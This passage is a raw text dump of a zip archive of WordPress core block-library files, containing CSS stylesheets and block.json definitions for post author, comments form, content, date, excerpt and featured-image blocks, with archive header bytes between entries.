margin-bottom:0; margin-top:0; width:100%; } .wp-block-post-author__avatar{ margin-right:1em; } .wp-block-post-author__bio{ font-size:.7em; margin-bottom:.7em; } .wp-block-post-author__content{ flex-basis:0; flex-grow:1; } .wp-block-post-author__name{ margin:0; }PK7[lA+66'post-author-biography/style-rtl.min.cssnu[.wp-block-post-author-biography{box-sizing:border-box}PK7[@d post-author-biography/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-author-biography", "title": "Author Biography", "category": "theme", "description": "The author biography.", "textdomain": "default", "attributes": { "textAlign": { "type": "string" } }, "usesContext": [ "postType", "postId" ], "supports": { "spacing": { "margin": true, "padding": true }, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[lA+66#post-author-biography/style.min.cssnu[.wp-block-post-author-biography{box-sizing:border-box}PK7[(it;;#post-author-biography/style-rtl.cssnu[.wp-block-post-author-biography{ box-sizing:border-box; }PK7[(it;;post-author-biography/style.cssnu[.wp-block-post-author-biography{ box-sizing:border-box; }PK7[ A11"post-author-name/style-rtl.min.cssnu[.wp-block-post-author-name{box-sizing:border-box}PK7[yP((post-author-name/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-author-name", "title": "Author Name", "category": "theme", "description": "The author name.", "textdomain": "default", "attributes": { "textAlign": { "type": "string" }, "isLink": { "type": "boolean", "default": false }, "linkTarget": { "type": "string", "default": "_self" } }, "usesContext": [ "postType", "postId" ], "supports": { "html": false, "spacing": { "margin": true, "padding": true }, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[ A11post-author-name/style.min.cssnu[.wp-block-post-author-name{box-sizing:border-box}PK7[0e66post-author-name/style-rtl.cssnu[.wp-block-post-author-name{ box-sizing:border-box; }PK7[0e66post-author-name/style.cssnu[.wp-block-post-author-name{ box-sizing:border-box; }PK7[W#@||!post-comments-form/editor.min.cssnu[.wp-block-post-comments-form *{pointer-events:none}.wp-block-post-comments-form .block-editor-warning *{pointer-events:auto}PK7[X$post-comments-form/style-rtl.min.cssnu[.wp-block-post-comments-form{box-sizing:border-box}.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){font-weight:inherit}.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){font-family:inherit}.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){font-size:inherit}.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){line-height:inherit}.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){font-style:inherit}.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){letter-spacing:inherit}.wp-block-post-comments-form input[type=submit]{box-shadow:none;cursor:pointer;display:inline-block;overflow-wrap:break-word;text-align:center}.wp-block-post-comments-form input:not([type=submit]),.wp-block-post-comments-form textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments-form textarea{padding:calc(.667em + 2px)}.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-right:.5em}PK7[Fzpost-comments-form/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-comments-form", "title": "Comments Form", "category": "theme", "description": "Display a post's comments form.", "textdomain": "default", "attributes": { "textAlign": { "type": "string" } }, "usesContext": [ "postId", "postType" ], "supports": { "html": false, "color": { "gradients": true, "heading": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontStyle": true, "__experimentalFontWeight": true, "__experimentalLetterSpacing": true, "__experimentalTextTransform": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-post-comments-form-editor", "style": [ "wp-block-post-comments-form", "wp-block-buttons", "wp-block-button" ] } PK7[qcpost-comments-form/editor.cssnu[.wp-block-post-comments-form *{ pointer-events:none; } .wp-block-post-comments-form .block-editor-warning *{ pointer-events:auto; }PK7[<] post-comments-form/style.min.cssnu[.wp-block-post-comments-form{box-sizing:border-box}.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){font-weight:inherit}.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){font-family:inherit}.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){font-size:inherit}.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){line-height:inherit}.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){font-style:inherit}.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){letter-spacing:inherit}.wp-block-post-comments-form input[type=submit]{box-shadow:none;cursor:pointer;display:inline-block;overflow-wrap:break-word;text-align:center}.wp-block-post-comments-form input:not([type=submit]),.wp-block-post-comments-form textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments-form textarea{padding:calc(.667em + 2px)}.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}PK7[qc!post-comments-form/editor-rtl.cssnu[.wp-block-post-comments-form *{ pointer-events:none; } .wp-block-post-comments-form .block-editor-warning *{ pointer-events:auto; }PK7[W#@||%post-comments-form/editor-rtl.min.cssnu[.wp-block-post-comments-form *{pointer-events:none}.wp-block-post-comments-form .block-editor-warning *{pointer-events:auto}PK7[ } post-comments-form/style-rtl.cssnu[.wp-block-post-comments-form{ box-sizing:border-box; } .wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){ font-weight:inherit; } .wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){ font-family:inherit; } .wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){ font-size:inherit; } .wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){ line-height:inherit; } .wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){ font-style:inherit; } .wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){ letter-spacing:inherit; } .wp-block-post-comments-form input[type=submit]{ box-shadow:none; cursor:pointer; display:inline-block; overflow-wrap:break-word; text-align:center; } .wp-block-post-comments-form input:not([type=submit]),.wp-block-post-comments-form textarea{ border:1px solid #949494; font-family:inherit; font-size:1em; } .wp-block-post-comments-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments-form textarea{ padding:calc(.667em + 2px); } .wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-post-comments-form .comment-reply-title{ margin-bottom:0; } .wp-block-post-comments-form .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-right:.5em; }PK7[!post-comments-form/style.cssnu[.wp-block-post-comments-form{ box-sizing:border-box; } .wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){ font-weight:inherit; } .wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){ font-family:inherit; } .wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){ font-size:inherit; } .wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){ line-height:inherit; } .wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){ font-style:inherit; } .wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){ letter-spacing:inherit; } .wp-block-post-comments-form input[type=submit]{ box-shadow:none; cursor:pointer; display:inline-block; overflow-wrap:break-word; text-align:center; } .wp-block-post-comments-form input:not([type=submit]),.wp-block-post-comments-form textarea{ border:1px solid #949494; font-family:inherit; font-size:1em; } .wp-block-post-comments-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments-form textarea{ padding:calc(.667em + 2px); } .wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-post-comments-form .comment-reply-title{ margin-bottom:0; } .wp-block-post-comments-form .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-left:.5em; }PK7[O))post-content/style-rtl.min.cssnu[.wp-block-post-content{display:flow-root}PK7[ Upost-content/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-content", "title": "Content", "category": "theme", "description": "Displays the contents of a post or page.", "textdomain": "default", "usesContext": [ "postId", "postType", "queryId" ], "supports": { "align": [ "wide", "full" ], "html": false, "layout": true, "dimensions": { "minHeight": true }, "spacing": { "blockGap": true }, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": false, "text": false } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-post-content-editor" } PK7[O))post-content/style.min.cssnu[.wp-block-post-content{display:flow-root}PK7[h՟..post-content/style-rtl.cssnu[.wp-block-post-content{ display:flow-root; }PK7[h՟..post-content/style.cssnu[.wp-block-post-content{ display:flow-root; }PK7[VN**post-date/style-rtl.min.cssnu[.wp-block-post-date{box-sizing:border-box}PK7[qdrRyypost-date/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-date", "title": "Date", "category": "theme", "description": "Display the publish date for an entry such as a post or page.", "textdomain": "default", "attributes": { "textAlign": { "type": "string" }, "format": { "type": "string" }, "isLink": { "type": "boolean", "default": false }, "displayType": { "type": "string", "default": "date" } }, "usesContext": [ "postId", "postType", "queryId" ], "supports": { "html": false, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[VN**post-date/style.min.cssnu[.wp-block-post-date{box-sizing:border-box}PK7[r//post-date/style-rtl.cssnu[.wp-block-post-date{ box-sizing:border-box; }PK7[r//post-date/style.cssnu[.wp-block-post-date{ box-sizing:border-box; }PK7[*}PPpost-excerpt/editor.min.cssnu[.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{display:inline}PK7[==post-excerpt/style-rtl.min.cssnu[:where(.wp-block-post-excerpt){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__excerpt{margin-bottom:0;margin-top:0}.wp-block-post-excerpt__more-text{margin-bottom:0;margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__more-link{display:inline-block}PK7[+3post-excerpt/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-excerpt", "title": "Excerpt", "category": "theme", "description": "Display the excerpt.", "textdomain": "default", "attributes": { "textAlign": { "type": "string" }, "moreText": { "type": "string" }, "showMoreOnNewLine": { "type": "boolean", "default": true }, "excerptLength": { "type": "number", "default": 55 } }, "usesContext": [ "postId", "postType", "queryId" ], "supports": { "html": false, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-post-excerpt-editor", "style": "wp-block-post-excerpt" } PK7[ٵUUpost-excerpt/editor.cssnu[.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{ display:inline; }PK7[==post-excerpt/style.min.cssnu[:where(.wp-block-post-excerpt){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__excerpt{margin-bottom:0;margin-top:0}.wp-block-post-excerpt__more-text{margin-bottom:0;margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__more-link{display:inline-block}PK7[ٵUUpost-excerpt/editor-rtl.cssnu[.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{ display:inline; }PK7[*}PPpost-excerpt/editor-rtl.min.cssnu[.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{display:inline}PK7[`xe``post-excerpt/style-rtl.cssnu[:where(.wp-block-post-excerpt){ margin-bottom:var(--wp--style--block-gap); margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__excerpt{ margin-bottom:0; margin-top:0; } .wp-block-post-excerpt__more-text{ margin-bottom:0; margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__more-link{ display:inline-block; }PK7[`xe``post-excerpt/style.cssnu[:where(.wp-block-post-excerpt){ margin-bottom:var(--wp--style--block-gap); margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__excerpt{ margin-bottom:0; margin-top:0; } .wp-block-post-excerpt__more-text{ margin-bottom:0; margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__more-link{ display:inline-block; }PK7[o??"post-featured-image/editor.min.cssnu[.wp-block-post-featured-image .block-editor-media-placeholder{-webkit-backdrop-filter:none;backdrop-filter:none;z-index:1}.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{align-items:center;display:flex;justify-content:center;min-height:200px;padding:0}.wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{display:none}.wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;padding:0;position:relative;width:48px}.wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{color:inherit}.wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){border-right-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){border-right-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){border-left-style:solid}.wp-block-post-featured-image[style*=height] .components-placeholder{height:100%;min-height:48px;min-width:48px;width:100%}div[data-type="core/post-featured-image"] img{display:block;height:auto;max-width:100%}PK7[?/%%%post-featured-image/style-rtl.min.cssnu[.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:transparent}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}PK7[3'post-featured-image/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-featured-image", "title": "Featured Image", "category": "theme", "description": "Display a post's featured image.", "textdomain": "default", "attributes": { "isLink": { "type": "boolean", "default": false }, "aspectRatio": { "type": "string" }, "width": { "type": "string" }, "height": { "type": "string" }, "scale": { "type": "string", "default": "cover" }, "sizeSlug": { "type": "string" }, "rel": { "type": "string", "attribute": "rel", "default": "" }, "linkTarget": { "type": "string", "default": "_self" }, "overlayColor": { "type": "string" }, "customOverlayColor": { "type": "string" }, "dimRatio": { "type": "number", "default": 0 }, "gradient": { "type": "string" }, "customGradient": { "type": "string" } }, "usesContext": [ "postId", "postType", "queryId" ], "supports": { "align": [ "left", "right", "center", "wide", "full" ], "color": { "__experimentalDuotone": "img, .wp-block-post-featured-image__placeholder, .components-placeholder__illustration, .components-placeholder::before", "text": false, "background": false }, "__experimentalBorder": { "color": true, "radius": true, "width": true, "__experimentalSelector": "img, .block-editor-media-placeholder, .wp-block-post-featured-image__overlay", "__experimentalSkipSerialization": true, "__experimentalDefaultControls": { "color": true, "radius": true, "width": true } }, "html": false, "spacing": { "margin": true, "padding": true } }, "editorStyle": "wp-block-post-featured-image-editor", "style": "wp-block-post-featured-image" } PK7[u0post-featured-image/editor.cssnu[.wp-block-post-featured-image .block-editor-media-placeholder{ -webkit-backdrop-filter:none; backdrop-filter:none; z-index:1; } .wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{ align-items:center; display:flex; justify-content:center; min-height:200px; padding:0; } .wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{ display:none; } .wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; padding:0; position:relative; width:48px; } .wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{ color:inherit; } .wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){ border-right-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){ border-left-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){ border-right-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){ border-left-style:solid; } .wp-block-post-featured-image[style*=height] .components-placeholder{ height:100%; min-height:48px; min-width:48px; width:100%; } div[data-type="core/post-featured-image"] img{ display:block; height:auto; max-width:100%; }PK7[?/%%!post-featured-image/style.min.cssnu[.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:transparent}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}PK7[dAt;"post-featured-image/editor-rtl.cssnu[.wp-block-post-featured-image .block-editor-media-placeholder{ -webkit-backdrop-filter:none; backdrop-filter:none; z-index:1; } .wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{ align-items:center; display:flex; justify-content:center; min-height:200px; padding:0; } .wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{ display:none; } .wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; padding:0; position:relative; width:48px; } .wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{ color:inherit; } .wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){ border-left-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){ border-right-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){ border-left-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image 